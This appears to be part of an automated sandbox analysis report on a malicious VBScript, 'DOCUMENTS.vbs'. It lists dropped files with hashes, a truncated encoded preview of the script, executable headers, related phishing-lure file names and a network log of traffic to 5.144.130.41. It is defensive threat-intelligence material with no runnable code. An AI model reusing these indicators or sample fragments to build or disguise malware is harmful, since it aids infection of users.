SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xerhkduq.lt2.ps1

Download File

Process:	C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs

Download File

Process:	C:\Users\user\Desktop\DOCUMENTS.vbs.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	987757
Entropy (8bit):	6.541418847847628
Encrypted:	false
SSDEEP:	24576:epGWy6Ik/RrxkoewTxrWKQvrYWE9WrwxFB4gW:mHPet1Em
MD5:	C7FAEEE6A7BEE0B9C88031C74961933F
SHA1:	C830717198C406F108040200CD687E0E9F25FDA2
SHA-256:	F7D3563D4E1017ED2F243D4FA74E737C4DB433CB6B8A78DCAFA7C5CB59C76C49
SHA-512:	FBD44171445C00D2A7875D0436A11E691E061B6301FF6391E1EB2A609A89FE89F214BCF28F13C3695DD42CF9AA886910768C20E27DB88773BD4129E3B74E5C08
Malicious:	true
Preview:	' HfqwgNyn1VaiDds4Gj60uwI64gM/6AbhIhMqsnreaQMrOxWULmFKIPYu/yIabXzvkBcsoJ9TKDXzz17IfSPbxKPYDN8pII2g78IMEOjkxrWWOiFischj1xLfoF8DgaPTUjt+QmCdxXCKi7HcRxdNDwipMkICeRLadDTNSYAtnW0fOb6sZYRU+XSx2CYXhpD7kpBWWU9g0dkppM0s0HzwXO1DvQ1ZoKmEVDjNUKDrw+2j0rbv10Mevmjkg8G2Jyn4wHs508mDofLn0gQXk4A4PeHgif7FAYWpJf6kdB3nzS0O1JAlsu8kHzDEBwQ+BivorEXg1p4rM7/2j63L3i3U/wTXCL7wE4vxu2nNAPmAah7TvMjYB/eO46HQLyJBWUED7wj/Z/5s+Ji57xo1XTLGdSSP9yFk/PgNSCQdIORor2InyhHxgQMfZ8QvHhjdWYVvCbn+smEfnvMQ8h7ZT9e0UD+4DZMg1fQhb5BdNd3fMO+frRYqav0ACCwd4Y7kRhjse87ZJUvyTjTF3EPRwmgVMMIvOqHBieZBtwVmA/NlPCl4cLoPBgujrV/hZY26L0XDCLDMtQt2K/Hol21Gi0tAX6AZWVKuBim3i41C4CRYh4e/ovpCmYcdAUXJJ2+dXCEToAXtoNbzFQGGFSl+NErMjw/lh+hQ/cYZ/FcM5d66GS9rLj8fauexy434u4Rdnsz6/Jdft9U4wqI/1KN+5zAizPv6EwULrCUoNLtbV0FBu16KEuhHW2FZM2uc4JZDMuRc1e+IY4vH709yNoMZ3Gtg/RhF9NVH23CZoOCZbsyP5QHX/oFSuFjTwyOZ1SXeQFYAO+N9/j4PFfp/7sKqLYCD4lCBQt7pDkTAcTCyrgVKu2CKmTLpEufDyOmH0sqWKJWiFvLUXf53Fy2evIwNXGb0NDNhIJRNmdBpvnn0YTx6KkmaD5gSdl1iEoEFSlVatWuCkp2WNAcBVXwiap+Eg7XwJJJDc03O4b7V/w4SR0

C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	5.502549953174867
Encrypted:	false
SSDEEP:	6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
MD5:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
SHA1:	F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
SHA-256:	73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
SHA-512:	6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: SKM_380785142007.bat, Detection: malicious, Browse Filename: CamScanner 08-28-2024 07.05.vbs, Detection: malicious, Browse Filename: Shipment Document 402402708^^^.vbs, Detection: malicious, Browse Filename: Accelya NDC SPRK Platform.vbs, Detection: malicious, Browse Filename: Accelya NDC SPRK Platform.vbs, Detection: malicious, Browse Filename: DHL-SOA_88417.bat, Detection: malicious, Browse Filename: SolaraBootstrapper.exe, Detection: malicious, Browse Filename: Unicredit__Copia_di_Pagamento.pdf.bat, Detection: malicious, Browse Filename: DTC.hta, Detection: malicious, Browse Filename: DHL-AIR-WAYBILL.bat, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".z.fg..fg..fg..x5..dg..o...lg..r...eg..r...}g..fg...g..r...cg..r...og..r...ng..r..gg..r...gg..Richfg..........................PE..L...s/.0..........................................@......................................@...... ...........................".......0...}......................\|....I..T............................................ ...............................text...\........................... ..`.data...8...........................@....idata....... ......................@..@.rsrc....}...0...~..................@..@.reloc..\|...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\DOCUMENTS.vbs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\DOCUMENTS.vbs.exe

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	5.502549953174867
Encrypted:	false
SSDEEP:	6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
MD5:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
SHA1:	F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
SHA-256:	73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
SHA-512:	6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SKM_380785142007.bat, Detection: malicious, Browse Filename: CamScanner 08-28-2024 07.05.vbs, Detection: malicious, Browse Filename: Shipment Document 402402708^^^.vbs, Detection: malicious, Browse Filename: Accelya NDC SPRK Platform.vbs, Detection: malicious, Browse Filename: Accelya NDC SPRK Platform.vbs, Detection: malicious, Browse Filename: DHL-SOA_88417.bat, Detection: malicious, Browse Filename: SolaraBootstrapper.exe, Detection: malicious, Browse Filename: Unicredit__Copia_di_Pagamento.pdf.bat, Detection: malicious, Browse Filename: DTC.hta, Detection: malicious, Browse Filename: DHL-AIR-WAYBILL.bat, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".z.fg..fg..fg..x5..dg..o...lg..r...eg..r...}g..fg...g..r...cg..r...og..r...ng..r..gg..r...gg..Richfg..........................PE..L...s/.0..........................................@......................................@...... ...........................".......0...}......................\|....I..T............................................ ...............................text...\........................... ..`.data...8...........................@....idata....... ......................@..@.rsrc....}...0...~..................@..@.reloc..\|...........................@..B........................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (65536), with no line terminators
Entropy (8bit):	6.541418847847628
TrID:
File name:	DOCUMENTS.vbs
File size:	987'757 bytes
MD5:	c7faeee6a7bee0b9c88031c74961933f
SHA1:	c830717198c406f108040200cd687e0e9f25fda2
SHA256:	f7d3563d4e1017ed2f243d4fa74e737c4db433cb6b8a78dcafa7c5cb59c76c49
SHA512:	fbd44171445c00d2a7875d0436a11e691e061b6301ff6391e1eb2a609a89fe89f214bcf28f13c3695dd42cf9aa886910768c20e27db88773bd4129e3b74e5c08
SSDEEP:	24576:epGWy6Ik/RrxkoewTxrWKQvrYWE9WrwxFB4gW:mHPet1Em
TLSH:	B025CEA21E34DE887384743A7EAC31A0D3E0DE7B2D7BD6505657EB5E5B2A9410B20F70
File Content Preview:	' HfqwgNyn1VaiDds4Gj60uwI64gM/6AbhIhMqsnreaQMrOxWULmFKIPYu/yIabXzvkBcsoJ9TKDXzz17IfSPbxKPYDN8pII2g78IMEOjkxrWWOiFischj1xLfoF8DgaPTUjt+QmCdxXCKi7HcRxdNDwipMkICeRLadDTNSYAtnW0fOb6sZYRU+XSx2CYXhpD7kpBWWU9g0dkppM0s0HzwXO1DvQ1ZoKmEVDjNUKDrw+2j0rbv10Mevmjkg8G2J

File Icon


Icon Hash:	68d69b8f86ab9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 2, 2024 07:48:03.683933020 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:03.683983088 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:03.684062004 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:03.725356102 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:03.725370884 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:13.497925043 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:13.498055935 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:13.513230085 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:13.513247013 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:13.513544083 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:13.535902023 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:13.576509953 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:13.952646971 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:13.999984980 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.122874975 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.122885942 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.122921944 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.122940063 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.122948885 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.123017073 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.123042107 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.123070955 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.123112917 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.167416096 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.167433977 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.167548895 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.167562962 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.167607069 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.295893908 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.295913935 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.295991898 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.296005011 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.296046972 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.328243017 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.328259945 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.328315973 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.328326941 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.328356981 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.328376055 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.359869003 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.359884977 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.359968901 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.359982014 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.360023022 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.387082100 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.387099981 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.387247086 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.387264013 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.387325048 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.464443922 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.464463949 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.464567900 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.464585066 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.464626074 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.486764908 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.486780882 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.486864090 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.486876965 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.486918926 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.506633043 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.506648064 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.506704092 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.506712914 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.506753922 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.521347046 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.521364927 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.521403074 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.521409988 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.521439075 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.521456957 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.537410021 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.537451982 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.537548065 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.537569046 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.537611008 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.549900055 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.549926996 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.549981117 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.549994946 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.550059080 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.563761950 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.563782930 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.563884020 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.563894033 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.563941956 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.623147011 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.623169899 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.623246908 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.623255968 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.623305082 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.633347034 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.633363008 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.633414984 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.633424044 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.633466005 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.644819975 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.644840956 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.644912958 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.644922018 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.644968987 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.655774117 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.655787945 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.655864000 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.655873060 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.655914068 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.671904087 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.671910048 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.671977043 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.671988010 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.672044992 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.674487114 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.674504042 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.674577951 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.674586058 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.674621105 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.681966066 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.681982040 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.682040930 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.682049036 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.682079077 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.682096004 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.690843105 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.690857887 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.690944910 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.690958977 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.691008091 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.702361107 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.702377081 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.702470064 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.702480078 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.702539921 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.712601900 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.712627888 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.712691069 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.712699890 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.712730885 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.712749004 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.725697041 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.725713015 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.725811005 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.725822926 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.725933075 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.734950066 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.734966040 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.735091925 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.735106945 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.735153913 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.745280981 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.745296955 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.745443106 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.745465040 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.745508909 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.755004883 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.755023956 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.755152941 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.755167007 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.755211115 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.782567978 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.782584906 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.782651901 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.782664061 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.782711983 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.788768053 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.788785934 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.788839102 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.788846970 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.788878918 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.788899899 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.795239925 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.795263052 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.795397043 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.795409918 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.795463085 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.800815105 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.800832987 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.800903082 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.800913095 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.800955057 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.812053919 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.812074900 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.812185049 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.812203884 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.812263012 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.821669102 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.821686983 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.821793079 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.821810007 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.821858883 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.831310987 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.831327915 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.831443071 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.831455946 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.831506014 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.840645075 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.840661049 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.840738058 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.840749025 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.840789080 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.864047050 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.864063025 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.864165068 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.864175081 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.864212990 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.868444920 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.868463039 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.868525028 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.868534088 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.868561029 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.868583918 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.875931978 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.875948906 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.876048088 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.876056910 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.876102924 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.883475065 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.883493900 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.883574009 CEST	49705	443	192.168.2.8	5.144.130.41
